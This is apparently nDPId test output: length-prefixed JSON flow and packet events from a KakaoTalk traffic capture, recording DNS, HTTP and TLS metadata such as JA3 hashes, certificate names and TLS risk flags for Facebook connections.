00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":146,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1430069031236,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069031236,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADxjDkAAPwYYeQoYUrwfDURUsJsBu8tPaEMAAAAAoAI5CF29AAACBAV4BAIICgALC00AAAAAAQMDBw=="}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":146,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031236,"flow_last_seen":1430069031236,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069031236,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45211,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":146,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1430069031236,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069031236,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADxjDkAAPwYYeQoYUrwfDURUsJsBu8tPaEMAAAAAoAI5CF29AAACBAV4BAIICgALC00AAAAAAQMDBw=="}
00563{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":147,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1430069031281,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":130,"pkt_l4_len":94,"thread_ts_msec":1430069031281,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAHLtrwAANREvOwq8AQEKGFK8ADU5OgBeI2eyooGAAAEAAQAAAAABMgI5NwMyNTIDMTczB2luLWFkZHIEYXJwYQAADAABwAwADAABAAAEYQAfEG1xdHQtc2h2LTE0LWZyYzEIZmFjZWJvb2sDY29tAA=="}
00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":147,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069031230,"flow_last_seen":1430069031281,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1430069031281,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":14650,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"2.97.252.173.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":148,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1430069031281,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069031281,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACw2WEAA+AaMPh8NRFQKGFK8Abuwm2JwnlDLT2hEYBIRHOBVAAACBAV4"}
00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":149,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1430069031284,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069031284,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAChjD0AAPwYYjAoYUrwfDURUsJsBu8tPaERicJ5RUBA5CM\/qAAA="}
00981{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":150,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069031236,"flow_last_seen":1430069031286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":570,"flow_tot_l4_payload_len":570,"flow_avg_l4_payload_len":142,"midstream":0,"thread_ts_msec":1430069031286,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"developers.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
01039{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":161,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069031236,"flow_last_seen":1430069031391,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1850,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1430069031391,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"developers.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256"}}
01829{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":164,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1430069031236,"flow_last_seen":1430069031408,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":4141,"flow_avg_l4_payload_len":414,"midstream":0,"thread_ts_msec":1430069031408,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"developers.facebook.com","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}}
00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":186,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031611,"flow_last_seen":1430069031611,"flow_idle_time":7440000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":1,"thread_ts_msec":1430069031611,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.253.199","src_port":58927,"dst_port":5223,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00544{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":186,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1430069031611,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":113,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":113,"pkt_l4_len":77,"thread_ts_msec":1430069031611,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAGHTnUAAQAbVXgoYUrw2\/\/3H5i8UZ+uf0VkGiXPCgBgCYxkQAAABAQgKAAKTKDTnT0kXAwEAKNOo\/lFrrxEtj1oyrBEybZXAvF7754xqLjvuYfV0gCpDpumAA3\/lW60="}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":210,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069035398,"flow_last_seen":1430069035398,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069035398,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":42332,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1430069035398,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069035398,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAChV8UAAQAbFkwoYUrzSZ\/APpVwBu+YrTKNirTiWUBFpAB9mAAA="}
00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":211,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1430069035537,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069035537,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACgkaUAAjgapG9Jn8A8KGFK8AbulXGKtOJbmK0ykUBCkj3bOAAA="}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":212,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069035840,"flow_last_seen":1430069035840,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069035840,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37557,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":212,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1430069035840,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069035840,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADytk0AAPwbN8woYUrwfDURUkrUAUM0qoIsAAAAAoAI5CEEgAAACBAV4BAIICgALDRgAAAAAAQMDBw=="}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1430069035877,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069035877,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACxm7kAA+AZbqB8NRFQKGFK8AFCStWTibgPNKqCMYBIRHPNeAAACBAV4"}
00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1430069035880,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069035880,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACitlEAAPwbOBgoYUrwfDURUkrUAUM0qoIxk4m4EUBA5COLzAAA="}
00851{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":216,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069035840,"flow_last_seen":1430069035921,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069035921,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37557,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.facebook.com","url":"www.facebook.com\/mobile\/status.php","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.3.0.KXDMICB)"}}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":217,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069035967,"flow_last_seen":1430069035967,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069035967,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45213,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1430069035967,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069035967,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzw1UAAPwaKsQoYUrwfDURUsJ0Bu3W4\/fMAAAAAoAI5CBvJAAACBAV4BAIICgALDSYAAAAAAQMDBw=="}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1430069036008,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069036008,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACxGQkAA+AZ8VB8NRFQKGFK8AbuwnWIYU8F1uP30YBIRHOshAAACBAV4"}
00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1430069036010,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069036010,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACjw1kAAPwaKxAoYUrwfDURUsJ0Bu3W4\/fRiGFPCUBA5CNq2AAA="}
00957{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069035967,"flow_last_seen":1430069036012,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1430069036012,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45213,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":228,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069036068,"flow_last_seen":1430069036068,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069036068,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35511,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":228,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1430069036068,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069036068,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADwqSkAAPwalnwoYUryt\/GECircBu1PEJ3oAAAAAoAI5CI51AAACBAV4BAIICgALDTAAAAAAAQMDBw=="}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":229,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1430069036109,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069036109,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACzrl0AA+AYrYa38YQIKGFK8AbuKt2bo6WFTxCd7YBIRHMNnAAACBAV4"}
00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":230,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1430069036113,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069036113,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACgqS0AAPwalsgoYUryt\/GECircBu1PEJ3tm6OliUBA5CLL8AAA="}
00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":231,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069036068,"flow_last_seen":1430069036116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1430069036116,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35511,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":232,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069035967,"flow_last_seen":1430069036121,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1464,"flow_avg_l4_payload_len":209,"midstream":0,"thread_ts_msec":1430069036121,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45213,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA"}}
01799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":240,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1430069035967,"flow_last_seen":1430069036179,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":3732,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1430069036179,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45213,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}}
01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":258,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069036068,"flow_last_seen":1430069036608,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1464,"flow_avg_l4_payload_len":209,"midstream":0,"thread_ts_msec":1430069036608,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35511,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA"}}
01799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":260,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1430069036068,"flow_last_seen":1430069036612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":3731,"flow_avg_l4_payload_len":414,"midstream":0,"thread_ts_msec":1430069036612,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35511,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}}
